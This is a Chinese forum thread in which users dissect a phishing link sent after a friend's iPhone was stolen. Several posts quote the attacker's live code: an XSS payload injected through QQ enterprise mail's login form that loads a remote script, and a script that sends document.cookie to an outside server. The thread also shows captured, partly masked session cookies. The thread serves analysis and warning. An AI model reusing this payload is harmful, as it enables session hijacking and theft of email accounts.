朋友 6S 被偷了，小偷（可能是团伙）发来链接偷取 APPLE ID

@typcn

手贱点了进去，一堆信息被上传了

@jedyu 感谢你去趟雷~~ 我就不点了。

@jedyu 我正在分析=-= 有一段 js 应该是用 cookie 去登 QQ 企业邮箱

@ScotGu
@saxon
是的，企业邮箱、个人邮箱、 QQ 号码及一堆 Cookie 都被传上去了。

扫了一下注入点，然后发现服务器挂了

@jedyu 能获得一些额外的信息么

不敢点

@saxon

c=wxstaytime=1423741712;
idqq_account=theCanChange=1;
theShowUin=145xxxxxx;
[email protected];
EmailCanSeach=1;
EmailIsActive=1;
UinCanSeach=1;
shouldshowmail=1;
firstsetidqq=1;
MSK=0;;
verifysession=h019bd3fd70a412c5e236282065369308f17xxxxxxbc0abc5294375bf583f5axxxxxxaf4f28ba;
qz_gdt=m6uqgvwxxxxxxq4ezk4ka;
qqmusic_uin=;
qqmusic_key=;
qqmusic_fromtag=;
new_mail_num=14xxxxxx8&1;
qm_flag=0;
[email protected];
sid=1407607908&exxxxxx115757efa325bc9b271,cvEGXXdNb8dQ.|-1683484644&354xxxxxx6cdfc76ddafdeb,cDA0IfXXXq4mY.;
biz_username=261xxxxxx;
CCSHOW=0000;
username=140761208&1403227908|-16342184644&261233652;
ssl_edition=b31.exmail.qq.com;
Hm_lvt_bdfb0d7xxxxxx0c5a5a2475c291ac7aca2=14xxxxxx;
Hm_lpvt_bdfb0d72xxxxxx5a5a2475c291ac7aca2=14xxxxxx;
_ga=GA1.3.1469923463.1445309872;
qm_username=14xxxxxx;
qm_sid=3240209253e03xxxxxx90db7a6,qSnpxxxxxxHVOR255bUx1by1rSWxxxxxxeFJna18.;
RK=CEeuCexxGR;
pt_clientip=133b3c0cxxxxxx4f;
pt_serverip=b7ff0abfxxxxxx60;
pt2gguin=o0014xxxxxx;
uin=o0014xxxxxx;
skey=@uF8W0XXXc;
ptisp=cnc;
ptcz=dccb14fd40d2xxxxxx43834eabd88d4d5a73c12561f4be2350fcxxxxxxa985;
pgv_info=ssid=s776441213&pgvReferrer=;
pgv_pvid=775212126;
o_cookie=14xxxxxx;
uid=12xxxxxx;
dc_vplaying=0;
tinfo=14xxxxxx.0000*;
wimrefreshrun=0&;
autologin=n

&u=lockKey8&r=http://eeee.washbowl.com.cn/htmlpage5.html

@jedyu 然后，我的 IP 好像也被 ban 了

<script>
function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
});
</script>
谁来讲解一下， qq.com 的 cookie 不是被 post 到腾讯的服务器了吗？他们是怎么得到的？

我没看正文直接点了，我要不要重装系统啊？！！！

定期改一下密码复杂一点。
把你的提示问题的答案设置的复杂一点（记得备份）

估计就是这个 http://www.wooyun.org/bugs/wooyun-2015-0144918
10-08 就确认了，还没修复。不知道是不好修复，还是不够重视。 rank 也只给 1 ，真没意思。

@laydown 速度改 QQ 密码就好了。

@aliuwr Mac 系统，也没装 QQ ，应该没事吧？

@laydown 看前面回复 似乎是偷 cookie 这就不好说了

手贱。直接点进去了。。。

D 它

既然这个网站可以直接获取 cookies
那么每天上网百度出的一堆垃圾站也可能用这招，只是没有这个有针对性。
看来用邮件客户端很有必要啊。

我的 iphone 被偷了后也收到过这类链接
点进去后发现不对劲 立马把相关密码都改了

在匿名模式打开看了下，自动去刷一大堆常见网站，看来有漏用户信息漏洞的公共网站不少啊

用的阿里云……

网址点进去后发现是个新闻网站。。。

@BOYPT

两个 iframe ，一些常见网站是人民网的分享接口进行的访问，不是攻击者。

另外一个 iframe 是进行攻击者的操作：

<iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>

<iframe src="/htmlpage5.html" style="display:none"></iframe>

---------------

function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
});


document.domain="qq.com";
window.onload=documentrrady;
function documentrrady(){
window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
};

比较好奇的是，往 qq 的 login post 一下，然后 document.domain="qq.com";这样就能从 document.cookie 拿信息了？？

吓得我赶紧改了 QQ 密码，清空了浏览器 cookie ，往常用网站上重新登陆了次，刷新了 cookie 。。。这样就没事了吧？

这次还好忍住了，先看评论，保命

嗯，刚才测试了一下，如果你的企业邮箱在登录情况下访问了如上网址，是可以登录你的邮箱。

@Evi1m0 蘑菇君？

用虚拟机开，发现 firefox 下 http://ryige.com/q/8 的脚本未被执行 不知怎么回事

难道我去慢了，打开只有一个 IIS 的图标什么事情都没有发生。

@skyun 个人认为密码还是窃取不到的..

@wohenyingyu01 并不是 只是挂了一个 iframe

你还是提醒一下别人别乱点链接吧。。。
我觉得很多人点玩看了评论都吓到了

我擦...点开了...有什么补救方法嘛！

@RHFS 提醒了

@curiosity 如果担心，可以改个 QQ 密码就行了

@kikyous web 第一课： cookie 在本地， session 在服务器